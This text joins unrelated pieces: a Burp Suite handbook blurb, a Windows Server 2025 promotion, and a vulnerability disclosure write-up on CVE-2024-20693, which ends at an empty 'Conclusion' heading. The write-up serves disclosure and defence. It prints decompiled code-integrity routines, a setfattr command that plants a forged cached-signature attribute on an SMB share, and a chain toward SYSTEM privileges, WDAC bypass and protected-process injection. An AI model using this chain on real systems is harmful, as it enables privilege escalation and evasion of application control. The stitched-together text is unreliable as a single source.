The chapter provides a step-by-step guide to setting up Burp for your specific application quickly and effectively. It guides you through minimizing setup errors and ensuring potential vulnerabilities are not overlooked—a game-changer in terms of your security auditing outcomes. We also explore using key Burp extensions to supercharge your application testing processes and discover more vulnerabilities.

Our Burp chapter concludes with numerous professional tips and tricks to empower you to perform advanced practices and to reveal hidden Burp characteristics that could revolutionize your security testing routine.

Real-world knowledge, real-world results

The Testing Handbook series encapsulates our extensive real-world knowledge and experience. Our insights go beyond mere documentation recitations, offering tried-and-tested strategies from the Trail of Bits team’s security auditing experience.

With this new chapter, we hope to impart the knowledge and confidence you need to dive into Burp Suite and truly harness its potential to secure your web applications.

Ready to supercharge your security testing with Burp Suite? Dive into the chapter now.

Windows Server 2025 and beyond

Windows Server 2025 is the most secure and performant release yet! Download the evaluation now!

Looking to migrate from VMware to Windows Server 2025? Contact your Microsoft account team!

The 2024 Windows Server Summit was held in March and brought three days of demos, technical sessions, and Q&A, led by Microsoft engineers, guest experts from Intel®, and our MVP community. For more videos from this year’s Windows Server Summit, please find the full session list here.

This article focuses on what’s new and what’s coming in Windows Server 2025.

What's new in Windows Server 2025

Get a closer look at Windows Server 2025. Explore improvements, enhancements, and new capabilities. We'll walk you through the big picture and offer a guide to which Windows Server Summit sessions will help you learn more.

What’s ahead for Windows Server

What’s in it for you? Get a summary of the most important features coming in Windows Server 2025 that will make your life easier and your work more impactful. In this fireside chat, Hari Pulapaka, Windows Server GM, and Jeff Woolsey, Principal PM Manager, provide an overview of what’s next and share their thoughts on how Windows Server can help you stay ahead.

CVE-2024-20693: Windows cached code signature manipulation

14 June 2024 at 00:00

In the Patch Tuesday update of April 2024, Microsoft released a fix for CVE-2024-20693, a vulnerability we reported. This vulnerability allowed manipulating the cached signature signing level of an executable or DLL. In this post, we’ll describe how we found this issue and what the impact could be on Windows 11.

Background

Last year, we started a project to improve our knowledge of Windows internals, specifically about local vulnerabilities such as privilege escalation. The best way to get started on a new target is to look at recent publications from other researchers. This gives the most up-to-date overview of the security design and makes it possible to look for variants of a vulnerability or even bypasses for the implemented fixes.

The most helpful prior work we found was the presentation “The Print Spooler Bug that Wasn’t in the Print Spooler” at OffensiveCon 2023 by Maddie Stone and James Forshaw from Google. This talk describes a Windows privilege escalation exploit discovered in the wild.

Privilege escalation using an impersonated device map and isolation-aware DLLs

In case you haven’t watched this presentation, we’ll summarize it here: a highly privileged Windows service that handles requests on behalf of lower-privileged processes can impersonate the requesting process, in order to make all operations performed by the highly privileged service be performed with the permissions and privileges of the lower-privileged process. This is a great security measure, as it means the highly privileged service can never accidentally do something the lower-privileged process would not be able to do itself.

One thing to note is that a (low-privileged) process on Windows can change its device map, which can be used to redirect a drive letter such as C: to a different location (for example a specific subfolder, like C:\fakeroot). This changed device map is one of the aspects included in impersonation. This is quite risky: what if the impersonating service attempts to load a DLL while impersonating another process which has set a different device map? That issue was already reported in 2015 by James Forshaw and fixed.

However, the logic for determining which file to load for LoadLibrary can be quite complicated if it involves side-by-side assemblies (WinSxS). On Windows, it’s possible to install multiple different versions of a DLL and manifest files can be used to specify which version to load for a specific application. DLL files can also include an embedded manifest to specify which version of its versioned dependencies to load. These are called “isolation aware” DLLs.

The core of the exploited vulnerability is the fact that when an isolation aware DLL file is loaded, the impersonated device map would be used to find the manifests of its dependencies. By combining this with a path traversal in the manifest file, it was possible to make a privileged service load a DLL from a folder on disk specified by the lower privileged process. Loading this malicious DLL would then lead to privilege escalation (impersonation by design no longer provides any security when malicious code is loaded, because it can revert the impersonation). For this attack to work, the impersonating service must load an isolation aware DLL, which depends on at least one other DLL.
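As a rough illustration of why a redirected device map is dangerous for file lookups, the following Python sketch models the idea. It is a toy model, not Windows code: `resolve` and the dictionary-based device map are hypothetical names introduced here, and real NT path resolution is considerably more involved.

```python
import ntpath


def resolve(path: str, device_map: dict[str, str]) -> str:
    """Resolve a DOS-style path through a per-process device map (toy model)."""
    drive, rest = ntpath.splitdrive(path)
    # A redirected drive letter is swapped for its target before the lookup.
    target = device_map.get(drive.upper(), drive)
    # normpath collapses ".." components, which is what a path traversal relies on.
    return ntpath.normpath(target + rest)


manifest = r"C:\Windows\WinSxS\Manifests\a.manifest"  # illustrative file name
print(resolve(manifest, {}))                      # lookup with the normal device map
print(resolve(manifest, {"C:": r"C:\fakeroot"}))  # lookup under the impersonated map
```

With the impersonated map in place, the same manifest path ends up below C:\fakeroot, a folder the low-privileged process controls.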

The fix applied by Microsoft to address the issue covered in the Maddie Stone and James Forshaw presentation was to apply a new mitigation to disable the loading of WinSxS manifests using the impersonated device map, but only for processes that have specifically opted in. This flag was only set for a few services that were known to be vulnerable. This means that a lot of privileged services were left that could be examined for the same issue. Very helpfully, Maddie and James explained how to configure Process Monitor on Windows to find these issues:

Screenshot from the presentation showing how to set up a Process Monitor filter.

So, we set to work finding issues like this. We made a list of isolation aware DLLs with at least one dependency on another library, set up the Process Monitor filters as described and wrote a simple PowerShell script (using the NtObjectManager PowerShell module also from James Forshaw) to enumerate all RPC services and attempt to call all methods. Then, we cross-referenced the libraries loaded under impersonation with the list of DLLs using a manifest.
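The cross-referencing step amounts to a set intersection. The sketch below is written in Python rather than the PowerShell that was actually used, and the function name and input shapes are assumptions made for illustration: a mapping from service to the DLL paths it loaded while impersonating, and a list of isolation aware DLL names.

```python
def cross_reference(loaded_under_impersonation, isolation_aware_dlls):
    """Map each service to the isolation aware DLLs it loaded while impersonating."""
    wanted = {name.lower() for name in isolation_aware_dlls}
    matches = {}
    for service, dll_paths in loaded_under_impersonation.items():
        # Compare on the lower-cased file name only, ignoring the directory.
        names = {p.replace("\\", "/").rsplit("/", 1)[-1].lower() for p in dll_paths}
        hits = sorted(names & wanted)
        if hits:
            matches[service] = hits
    return matches


# Illustrative input only; the real data came from Process Monitor traces.
observed = {
    "wscsvc.dll": [r"C:\Windows\System32\gpedit.dll"],
    "example.dll": [r"C:\Windows\System32\kernel32.dll"],
}
print(cross_reference(observed, ["gpedit.dll"]))
```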

We found a single match: wscsvc.dll!

wscsvc.dll

When the RPC endpoint with number 12 on this service (which takes no arguments) is called, it indirectly loads gpedit.dll. This is an isolation aware DLL, which depends on (among others) comctl32.dll. We replicated the setup from the in-the-wild exploit: we created a new directory at C:\fakeroot, added the required manifest and DLL files, redirected C: to C:\fakeroot and then sent this RPC request.

And it works… almost. Process Monitor shows that it opens and reads our fake DLL file, but never gets to “Load Image”, which is the step where the actual code execution starts. Somehow, it was resolving our DLL but refusing to execute its code.

Then we found out that the process associated with the wscsvc.dll service, namely the “Windows Security Center Service”, is categorized as a PPL (Protected Process Light). This means that it places restrictions on the code signature of DLL files it loads.

Protected Process (Light)

Windows recognizes a number of different protection levels to protect processes from being “modified” (such as terminating them, modifying their memory or adding new threads) by a process at a lower protection level. This is used, for example, to make it harder to disable AV tools or important Windows services.

As of Windows 11, the protection levels are:

Level Value
App 8
WinSystem 7
WinTcb 6
Windows 5
Lsa 4
Antimalware 3
CodeGen 2
Authenticode 1
None 0

Whether an operation is allowed is determined by a table known as RtlProtectedAccess. We have summarized it as follows:

→Target ↓Requesting Authenticode CodeGen Antimalware Lsa Windows WinTcb WinSystem App
Authenticode
CodeGen
Antimalware
Lsa
Windows
WinTcb
WinSystem

It can roughly be summarized as follows: Windows, WinTcb and WinSystem form a hierarchy (Windows < WinTcb < WinSystem). Authenticode, CodeGen, Antimalware and Lsa are separate groups that only allow access from processes in the same group or the Win-* hierarchy. We are not sure how “App” is used; it is new in Windows 10 and has not been documented very well.

In addition, there is the difference between a Protected Process (PP) and a Protected Process Light (PPL): a Protected Process can modify a Protected Process Light (based on the table above), but not the other way around. Some examples are Antimalware PPLs for third-party security tools and WinTcb or Windows at PP for critical Windows services (like managing DRM). Keep in mind that these protection levels are also in addition to all other authorization checks (such as integrity levels) in Windows. For more information about protected processes, see https://itm4n.github.io/lsass-runasppl/.
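The rough summary above can be written down as a small decision function. This Python sketch encodes only that prose summary, not the actual RtlProtectedAccess table; the function name is hypothetical, and the case of a non-Win-* requester targeting the Win-* hierarchy is an assumption that the text does not spell out.

```python
from typing import Optional

WIN_HIERARCHY = {"Windows": 0, "WinTcb": 1, "WinSystem": 2}
SEPARATE_GROUPS = {"Authenticode", "CodeGen", "Antimalware", "Lsa"}


def may_modify(req_kind: str, req_signer: str,
               tgt_kind: str, tgt_signer: str) -> Optional[bool]:
    """kind is "PP" or "PPL". Returns None where the summary is silent."""
    # A PPL can never modify a full Protected Process.
    if req_kind == "PPL" and tgt_kind == "PP":
        return False
    # Separate groups accept their own group or anything in the Win-* hierarchy.
    if tgt_signer in SEPARATE_GROUPS:
        return req_signer == tgt_signer or req_signer in WIN_HIERARCHY
    if tgt_signer in WIN_HIERARCHY:
        if req_signer in WIN_HIERARCHY:
            return WIN_HIERARCHY[req_signer] >= WIN_HIERARCHY[tgt_signer]
        # Assumption: requesters outside the hierarchy cannot reach into it.
        return False
    return None  # for example "App", which is not well documented


print(may_modify("PPL", "WinTcb", "PPL", "Antimalware"))
print(may_modify("PPL", "Lsa", "PPL", "Antimalware"))
```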

Note that this is not considered a defended security boundary by Microsoft: a process running as Administrator can load an exploitable kernel driver, which can be used to modify all protected processes. As admin to kernel is not a security boundary according to Microsoft, protected processes can also not be a security boundary for Administrators.

Aside from the restrictions on being manipulated by other processes, protected processes are also limited in what DLLs they may load. For example, anti-malware services may only load DLLs signed with the same codesigning certificate or by Microsoft itself. From Protecting anti-malware services:

DLL signing requirements

[A]ny non-Windows DLLs that get loaded into the protected service must be signed with the same certificate that was used to sign the anti-malware service.

For protected processes in general, they are only allowed to load a DLL signed with a specific Signature Level. Signature levels are assigned to a DLL based on the certificate and its issuer used for the code signature. The exact rules for when which PPL level may load a DLL with a specific signature level are quite complicated (and these rules can even be customized with a secure boot policy) and we’ll not go into those here. But to summarize: only certain Windows-signed DLLs were allowed to be loaded into our target service.

At this point we had two options: find a different service with the same WinSxS under impersonation vulnerability, or try to bypass the signing of Windows DLL files. The option most likely to yield results would of course have been to look for a different service, but the goal of the project was to understand Windows internals better, so we decided to spend a little bit of time on understanding how DLL files are signed.

Sector 7 deciding what to research.

DLL signatures

The codesigning process for PE files is known as Authenticode. Just like TLS, it is based on X.509 certificates. An Authenticode signature is generated by computing the hash of the PE file (leaving out certain fields that will change after signing, such as the checksum and the section for the signature itself), then signing that hash and appending it to the file with the certificate chain (and optionally a timestamp).
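The "hash everything except the fields that change after signing" idea can be sketched as follows. This Python example is a simplification: `digest_excluding` is a hypothetical helper, the offsets in the usage lines are made up, and real Authenticode hashing derives the skipped ranges from the PE headers rather than taking them as arguments.

```python
import hashlib


def digest_excluding(data: bytes, skipped: list[tuple[int, int]]) -> str:
    """SHA-256 over data, leaving out each (offset, length) range."""
    h = hashlib.sha256()
    pos = 0
    for offset, length in sorted(skipped):
        h.update(data[pos:offset])          # hash the bytes before the skipped range
        pos = max(pos, offset + length)     # then jump past it
    h.update(data[pos:])                    # hash whatever follows the last range
    return h.hexdigest()


original = bytes(range(64))
patched = bytearray(original)
patched[16:20] = b"\xff" * 4  # pretend this is a checksum rewritten after signing

# Same digest, because the modified bytes fall inside the skipped range.
print(digest_excluding(original, [(16, 4)]) == digest_excluding(bytes(patched), [(16, 4)]))
```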

Because signature verification can be slow and loading DLLs happens often on Windows, a caching method has been implemented for code signatures. For a signed DLL or EXE file, the result of the certificate verification can be stored in an NTFS Extended Attribute (EA) named $KERNEL.PURGE.ESBCACHE. The $KERNEL part of this name means that only the Windows kernel is allowed to set or change this EA. The PURGE part means that the EA will be automatically removed if the contents of the file are modified. This means that it should not be possible to set this EA from usermode or to modify the file without removing the EA. This only works on journaled NTFS partitions, as the PURGE functionality depends on the journal. Note that nothing in this EA binds it to the file: these attributes contain the journal ID, but nothing like a file path or inode number.

In 2017, James Forshaw had reported that it was possible to race the application of this EA: by making the file refer to a catalog, it was possible to slow down the verification enough to modify the contents of the file in between the verification of the signature and the application of the EA. As this was already found a while ago, it was unlikely that doing this was going to work.

We experimented with placing the file on an SMB share instead and attempting to rewrite the contents in between the verification and image loading, but this wasn’t working either (the file was only being read once). But looking at our Wireshark capture and the decompiled code in CI.DLL that parses the $KERNEL.PURGE.ESBCACHE extended attribute, we noticed something that stood out:

Screenshot from Wireshark showing an ioctl request with ID 0x90390.

A $KERNEL.PURGE.ESBCACHE extended attribute should only be trusted on the local volume, as a filesystem on (for example) a USB drive or mounted disk image could have been manipulated by the user. There was a check in the code we assumed was meant to check for this and only allow the local boot disk using the function CipGetVolumeFlags.

__int64 __fastcall CipGetVolumeFlags(__int64 file, int *attributeInformation, _BYTE *containerState)
{
  int *v6; // x20
  BOOL shouldFree; // w21
  int ioctlResponse; // w9
  unsigned int err; // w19
  unsigned int v10; // w19
  __int64 buffer; // x0
  int outputBuffer; // [xsp+0h] [xbp-40h] BYREF
  int returnedOutputBufferLength; // [xsp+4h] [xbp-3Ch] BYREF
  int fsInformation[14]; // [xsp+8h] [xbp-38h] BYREF

  outputBuffer = 0;
  returnedOutputBufferLength = 0;
  memset(fsInformation, 0, 48);
  v6 = fsInformation;
  shouldFree = 0;
  // containerState will be set based on the response to the ioctl with ID 0x90390LL on the file
  if ( (int)FsRtlKernelFsControlFile(file, 0x90390LL, 0LL, 0LL, &outputBuffer, 4LL, &returnedOutputBufferLength) >= 0 )
    ioctlResponse = outputBuffer;
  else
    ioctlResponse = 0;
  outputBuffer = ioctlResponse;
  *containerState = ioctlResponse & 1;
  // attributeInformation will be set based on the IoQueryVolumeInformation for FileFsAttributeInformation (5)
  err = IoQueryVolumeInformation(file, 5LL, 48LL, fsInformation, &returnedOutputBufferLength);
  if ( err == 0x80000005 )
  {
    // Retry in case the buffer is too small
    v10 = fsInformation[2] + 8;
    buffer = ExAllocatePool2(258LL, (unsigned int)(fsInformation[2] + 8), 'csIC');
    v6 = (int *)buffer;
    if ( !buffer )
      return 0xC000009A;
    shouldFree = 1;
    err = IoQueryVolumeInformation(file, 5LL, v10, buffer, &returnedOutputBufferLength);
  }
  if ( (err & 0x80000000) == 0 )
    *attributeInformation = *v6;
  if ( shouldFree )
    ExFreePoolWithTag(v6, 'csIC');
  return err;
}

This was being called from CipGetFileCache:

__int64 __fastcall CipGetFileCache(
        __int64 fileObject,
        unsigned __int8 a2,
        int a3,
        unsigned int *a4,
        _DWORD *a5,
        unsigned __int8 *a6,
        int *a7,
        __int64 a8,
        _DWORD *a9,
        _DWORD *a10,
        __int64 a11,
        __int64 a12,
        _QWORD *a13,
        __int64 *a14)
{
  __int64 eaBuffer_1; // x20
  unsigned __int64 v17; // x22
  unsigned int fileAttributes; // w25
  unsigned int attributeInformation_FileSystemAttributes; // w19
  unsigned int err; // w19
  unsigned int err_1; // w0
  __int64 v22; // x4
  __int64 v23; // x3
  __int64 v24; // x2
  __int64 v25; // x1
  int containerState_1; // w10
  unsigned int v28; // w8
  __int64 eaBuffer; // x0
  _DWORD *v30; // x23
  unsigned __int8 *v31; // x24
  int v32; // w8
  char v33; // w22
  const char *v34; // x10
  __int16 v35; // w9
  char v36; // w8
  unsigned int v37; // w25
  int v38; // w9
  int IsEnabled; // w0
  unsigned int v40; // w8
  unsigned int ContextForReplay; // w0
  __int64 v42; // x2
  _QWORD *v43; // x11
  int v44; // w10
  __int64 v45; // x9
  unsigned __int8 containerState; // [xsp+10h] [xbp-C0h] BYREF
  char v47[7]; // [xsp+11h] [xbp-BFh] BYREF
  _DWORD *v48; // [xsp+18h] [xbp-B8h]
  unsigned __int8 *v49; // [xsp+20h] [xbp-B0h]
  unsigned __int8 v50; // [xsp+28h] [xbp-A8h]
  unsigned __int64 v51; // [xsp+30h] [xbp-A0h] BYREF
  unsigned int v52; // [xsp+38h] [xbp-98h]
  int attributeInformation; // [xsp+3Ch] [xbp-94h] BYREF
  int v54; // [xsp+40h] [xbp-90h] BYREF
  int lengthReturned_1; // [xsp+44h] [xbp-8Ch] BYREF
  int lengthReturned; // [xsp+48h] [xbp-88h] BYREF
  int v57; // [xsp+4Ch] [xbp-84h]
  __int64 v58; // [xsp+50h] [xbp-80h]
  __int64 v59; // [xsp+58h] [xbp-78h]
  __int64 v60; // [xsp+60h] [xbp-70h]
  _QWORD *v61; // [xsp+68h] [xbp-68h]
  int *v62; // [xsp+70h] [xbp-60h]
  int eaList[8]; // [xsp+78h] [xbp-58h] BYREF
  char fileBasicInformation[40]; // [xsp+98h] [xbp-38h] BYREF

  [...]

  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 )
  {
    containerState_1 = 0;
  }
  else
  {
    lengthReturned_1 = 0;
    memset(fileBasicInformation, 0, sizeof(fileBasicInformation));
    err = IoQueryFileInformation(fileObject, 4LL, 40LL, fileBasicInformation, &lengthReturned_1);
    if ( (err & 0x80000000) != 0 )
    {
      [...]
      goto LABEL_8;
    }
    fileAttributes = *(_DWORD *)&fileBasicInformation[32];
    // Calling the function above
    err_1 = CipGetVolumeFlags(fileObject, &attributeInformation, &containerState);
    v17 = v51;
    err = err_1;
    if ( (err_1 & 0x80000000) != 0 )
    {
      *a4 = 27;
LABEL_7:
      v22 = *a4;
      goto LABEL_8;
    }
    attributeInformation_FileSystemAttributes = attributeInformation;
    containerState_1 = containerState;
  }
  // If the out variable containerState was non-zero, all of the checks don't matter and we go to LABEL_19 to read the EA.
  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 || containerState_1 )
    goto LABEL_19;
  if ( (g_CiOptions & 0x100) == 0 )
  {
    if ( (attributeInformation_FileSystemAttributes & 0x20000) == 0 || (fileAttributes & 0x4000) == 0 )
    {
      *a4 = 5;
      v17 = fileAttributes | ((unsigned __int64)attributeInformation_FileSystemAttributes << 32);
      err = 0xC00000BB;
      goto LABEL_7;
    }
    goto LABEL_23;
  }
  if ( (attributeInformation_FileSystemAttributes & 0x20000) != 0 && (fileAttributes & 0x4000) != 0 )
  {
	
	[...]

  }
LABEL_19:
  eaBuffer = ExAllocateFromPagedLookasideList(&g_CiEaCacheLookasideList);
  eaBuffer_1 = eaBuffer;
  if ( !eaBuffer )
  {
    v28 = 28;
    err = 0xC0000017;
    goto LABEL_12;
  }
  v33 = v50;
  eaList[0] = 0;
  LOBYTE(eaList[1]) = 22;
  if ( v50 )
  {
    v34 = "$Kernel.Purge.CIpCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.CIpCache";
  }
  else
  {
    v34 = "$Kernel.Purge.ESBCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.ESBCache";
  }
  v35 = *((_WORD *)v34 + 10);
  *(int *)((char *)&eaList[5] + 1) = *((_DWORD *)v34 + 4);
  v36 = v34[22];
  *(_WORD *)((char *)&eaList[6] + 1) = v35;
  HIBYTE(eaList[6]) = v36;
  err = FsRtlQueryKernelEaFile(fileObject, eaBuffer, 380LL, 0LL, eaList, 32LL, 0LL, 1LL, &lengthReturned);
  if ( (err & 0x80000000) != 0 )
  {
    *a4 = 2;
LABEL_34:
    v30 = v48;
    v31 = v49;
LABEL_35:
    ExFreeToPagedLookasideList(&g_CiEaCacheLookasideList, eaBuffer_1);
    v17 = v51;
    goto LABEL_36;
  }
  err = CipParseFileCache(eaBuffer_1, v33, (int *)a4, &v51, eaBuffer_1 + 488);
  if ( (err & 0x80000000) != 0 )
    goto LABEL_34;
  v37 = v57;
  err = CipVerifyFileCache((__int64 *)(eaBuffer_1 + 488), eaBuffer_1, fileObject, v57, v58, &v54, (int *)a4, &v51);
  
  [...]

  return err;
}

What we assumed to be an ioctl that would be handled by the SMB driver (using code 0x90390, which isn’t documented officially, but may refer to FSCTL_QUERY_VOLUME_CONTAINER_STATE, based on Microsoft’s Rust headers) turned out to be an ioctl that gets forwarded over SMB to the server. (While we called it NTFS Extended Attributes, these extended attributes in fact work over SMB too.)

If that ioctl results in a value with the lowest bit set, containerState/containerState_1 in CipGetFileCache become non-zero and the code jumps to LABEL_19 above (skipping a lot of checks on the file type, device type and a g_CiOptions global we don’t fully understand either).

In other words: the $KERNEL.PURGE.ESBCACHE extended attribute on a file on an SMB share is trusted if the SMB server itself responds to this ioctl that it should be trusted! This is of course a problem, as by default non-admin users can mount new network shares.
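The visible part of that control flow can be condensed into a short model. The Python sketch below follows only the branches shown in the decompiled listing above; the function names are hypothetical, the branches hidden behind [...] are reported as "elided" rather than guessed, and the meaning of the individual flag bits is deliberately left uninterpreted.

```python
def container_state(ioctl_status: int, output: int) -> int:
    """Mirror CipGetVolumeFlags: a failed ioctl counts as 0, else keep only bit 0."""
    return (output & 1) if ioctl_status >= 0 else 0


def cache_decision(file_flag_0x100: bool, state: int, ci_options: int,
                   fs_attrs: int, file_attrs: int) -> str:
    """Return which visible branch of CipGetFileCache would be taken."""
    if file_flag_0x100 or state:
        return "read-ea"            # jumps straight to LABEL_19
    both_bits = (fs_attrs & 0x20000) != 0 and (file_attrs & 0x4000) != 0
    if (ci_options & 0x100) == 0:
        if not both_bits:
            return "reject"         # err = 0xC00000BB
        return "elided"             # goto LABEL_23, not shown in the listing
    if both_bits:
        return "elided"             # body replaced by [...] in the listing
    return "read-ea"                # falls through to LABEL_19


# A server that answers the ioctl with 0x00000001 short-circuits every check.
print(cache_decision(False, container_state(0, 0x00000001), 0, 0, 0))
```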

We started out with Samba and patched it to always respond 0x00000001 to this ioctl (it is not implemented currently) and implemented two more ioctls: 0x900f4 (FSCTL_QUERY_USN_JOURNAL) for reading the journaling information and 0x900ef (FSCTL_WRITE_USN_CLOSE_RECORD) for flushing the journal. We configured Samba to use the ext3 extended attributes to store the EAs used for SMB.
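The three control codes mentioned here follow the standard Windows CTL_CODE layout (device type in bits 16 to 31, required access in bits 14 to 15, function in bits 2 to 13, transfer method in bits 0 to 1). The following Python sketch decodes them; the `CtlCode` tuple and `decode_ctl_code` are names introduced for this example only.

```python
from typing import NamedTuple


class CtlCode(NamedTuple):
    device_type: int
    access: int
    function: int
    method: int


def decode_ctl_code(code: int) -> CtlCode:
    """Split a Windows I/O control code into its four bit fields."""
    return CtlCode(
        device_type=(code >> 16) & 0xFFFF,
        access=(code >> 14) & 0x3,
        function=(code >> 2) & 0xFFF,
        method=code & 0x3,
    )


for code in (0x90390, 0x900F4, 0x900EF):
    print(hex(code), decode_ctl_code(code))
```

All three decode to device type 9 (FILE_DEVICE_FILE_SYSTEM), which fits the fact that they are file system control codes.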

And it worked! From our Linux server running Samba, we could apply any $KERNEL.PURGE.ESBCACHE attribute on a file and Windows would trust it. On Linux, the extended attributes used by Samba can be set using setfattr (see footnote 1).

setfattr -n 'user.$KERNEL.PURGE.ESBCACHE' -v '0skwAAAAMAAg4AAAAAAAAAAIC1e18kqdkBQgAAAHUAJwEMgAAAIGliE1R8dXRmTogdh511MDKXHu0gQC2E1gewfvL5KmZ+JwAMgAAAIGOIg7QdUUiX461yis071EIc4IyH1TDa1WkxRY/PW8thJwQMgAAAIDSDabKZZ2jBOK8AdcS2gu8F0miSEm+H/RilbYQrLrbj' "$1"
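The `0s` prefix in the value tells setfattr that what follows is base64 (a `0x` prefix would mean hexadecimal). The Python sketch below decodes such a value into raw bytes; `decode_setfattr_value` is a hypothetical helper written for this example, and it makes no attempt to interpret the structure of the attribute itself.

```python
import base64


def decode_setfattr_value(value: str) -> bytes:
    """Turn a setfattr -v argument into the raw attribute bytes."""
    prefix = value[:2]
    if prefix in ("0s", "0S"):
        return base64.b64decode(value[2:])   # base64-encoded value
    if prefix in ("0x", "0X"):
        return bytes.fromhex(value[2:])      # hex-encoded value
    return value.encode()                    # plain text value


print(decode_setfattr_value("0sQUJD"))
```

On Linux, the resulting bytes could also be written from Python with `os.setxattr(path, "user.$KERNEL.PURGE.ESBCACHE", blob)` instead of calling setfattr.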

We could now create fake EAs that could specify any code signing level we wanted. How can we abuse this?

Combining the DLL load and signature bypass

Now we got to the next challenge: how do we combine these two vulnerabilities? We could make wscsvc.dll load our own DLL using path traversal, but we can’t use path traversal to get from C: into an SMB share. A symbolic link could work, but by default non-admin users on Windows are not allowed to create these. Directory junctions and other symlink-like constructs that Windows supports cannot point to SMB shares.

We could perform the attack if the user plugged in an NTFS-formatted USB device with a symlink to the SMB share. The user could then create a directory junction from the new C: mountpoint in their device map to the USB disk.

C:\fakeroot --(directory junction)--> E:\ --(symlink)--> \\sambaserver\mount

But this required physical access to the machine. We preferred something that would also work remotely.

So we needed a third vulnerability: creating a symlink as a non-admin user.

We tried various things, like mounting disk images or unpacking zip files with symlinks, but before we had found a way to do this, Microsoft had rolled out a more extensive fix for the WinSxS manifest loading under impersonated device maps in August 2023 (as CVE-2023-35359): instead of being opt-in for processes, the device map was now always ignored for reading the manifest.

This meant that our DLL loading vulnerability in wscsvc.dll was no longer working, but we still had the signature bypass. So, next question: what can we do with just cached signature level manipulation on Windows?

Applying the signature bypass

Privilege escalation to SYSTEM using .theme files

In the previous post “Getting SYSTEM on Windows in style” we showed how we managed to elevate privileges on Windows by racing a signing check for a DLL included from a Windows .theme file. In that post, we used a race condition, but we originally found it by setting a manipulated $KERNEL.PURGE.ESBCACHE attribute on the *.msstyles_vrf.dll file. This worked in essentially the same way: we set a new theme which refers to a specifically crafted .msstyles file. Next to the .msstyles file, we place a .msstyles_vrf.dll file. When the user logs in (or sets DPI scaling to >100%), WinLogon.exe (which runs as SYSTEM) will check the signature level of this DLL file, and if it is at least signed at level 6 (“Store”), it will load it, elevating our privileges.

As Microsoft completely removed the loading of *.msstyles_vrf.dll files from themes for CVE-2023-38146, this issue was also fixed.

Bypassing WDAC

One place where cached signatures were used for executables is for Windows Defender Application Control (WDAC), which is an allowlisting technology for executables on Windows. This functionality can be used (typically in a corporate environment) to limit which applications a user is allowed to run and which DLLs may be loaded. Binaries can be allowlisted based on file path, file hash but also the identity of the code signer. WDAC policies can be very powerful and granular, so each company using it probably has their own policy, but the default templates allow all software signed by Microsoft itself to run.

Assuming the WDAC policy allows all software signed by Microsoft, we can add an EA indicating Microsoft as the signer to any executable and run it.

Injecting code into protected processes

The signature bypass can also be used by administrators to inject code into a protected process (regardless of the level). For example, an administrator can replace a DLL from system32 with a symlink to an SMB share and then launch a service that runs as a protected process.

Keep in mind that this is not considered a security boundary by Microsoft, which also means that known techniques that abuse this do not get fixed. So for our demonstration we combined it with the approach used by ANGRYORCHARD to mark our thread as a kernel mode thread and then map the device’s physical memory into our process.

Combining all steps

  1. We use the modified EA on a .msstyles_vrf.dll file to bypass the signature verification in Winlogon.exe to elevate privileges to SYSTEM.
  2. We replace a DLL file from system32 with a symlink to a file with a manipulated cached signature on the SMB share. Then, we launch a protected process running at level WinTcb (we chose services.exe).
  3. We use our code running in services.exe to inject code into CSRSS.exe and apply the technique from ANGRYORCHARD to gain physical memory r/w.

Combined with the Mark-of-the-Web bypass found by gabe_k for .themepack files, this attack could have been triggered with just the user opening a downloaded file. Depending on the WDAC policy, we could also have bypassed that.

Fix

So, how did Microsoft fix this?

We had hoped they would disable the reading of $KERNEL.* extended attributes from SMB completely. However, that was not the approach that was taken. Instead, the instances we exploited were fixed:

  1. The fix for CVE-2023-38146 already disabled the loading for *.msstyles_vrf.dll files completely, fixing the privilege escalation.
  2. When WDAC is enabled, the function to retrieve the cached signature level of a file now always returns an error (even for local files!).
  3. When loading a DLL into a protected process, the cached signature level is no longer used. (This was fixed despite Microsoft not considering it a defended security boundary.)

Timeline

  • August 25, 2023: Issue reported to MSRC.
  • September 12, 2023: The fix for CVE-2023-38146 was released, breaking our privilege escalation exploit.
  • September 20, 2023: MSRC indicates that they have reproduced the issue and that a fix is scheduled for January 2024.
  • December 11, 2023: MSRC informs us that a regression was found and asks to reschedule the fix to April 2024.
  • April 9, 2024: Fix released for the WDAC and PPL bypass as CVE-2024-20693.
  • April 25, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us.
  • April 26, 2024: Microsoft Bounty Team sends back a boilerplate reply that the case is under review.
  • May 17, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us again.
  • May 22, 2024: Microsoft Bounty Team replies that the vulnerability was out of scope for a bounty, claiming it didn’t reproduce on the right WIP build.

Mitigation

This attack depends on the victim connecting to a malicious SMB server. Therefore, blocking outgoing SMB to the internet would make this attack a lot harder (unless the attacker already has a foothold on the local network). Preventing users from mounting new SMB shares could also be done as a mitigation, but could have more unintended results.

Examining SMB traffic for exploitation of this issue should also be possible by looking for responses to the ioctl 0x90390 or responses for the EA $KERNEL.PURGE.ESBCACHE.
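A very naive version of such a check is sketched below in Python. It assumes that the SMB2 payload is already available as unencrypted bytes and simply searches for the little-endian control code and the EA name; the function name is hypothetical, and a four-byte pattern match like this will produce false positives, so a real detection should parse the SMB2 messages properly.

```python
import struct

IOCTL_CODE = struct.pack("<I", 0x90390)  # control code as it appears on the wire
EA_NAME = b"$KERNEL.PURGE.ESBCACHE"


def suspicious_markers(payload: bytes) -> list[str]:
    """Return the indicators from the text that occur in a raw SMB2 payload."""
    found = []
    if IOCTL_CODE in payload:
        found.append("ioctl 0x90390")
    # EA names are compared case-insensitively here.
    if EA_NAME in payload.upper():
        found.append("EA " + EA_NAME.decode())
    return found


sample = b"\x00" * 4 + IOCTL_CODE + b"$Kernel.Purge.ESBCache\x00"
print(suspicious_markers(sample))
```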

Conclusion

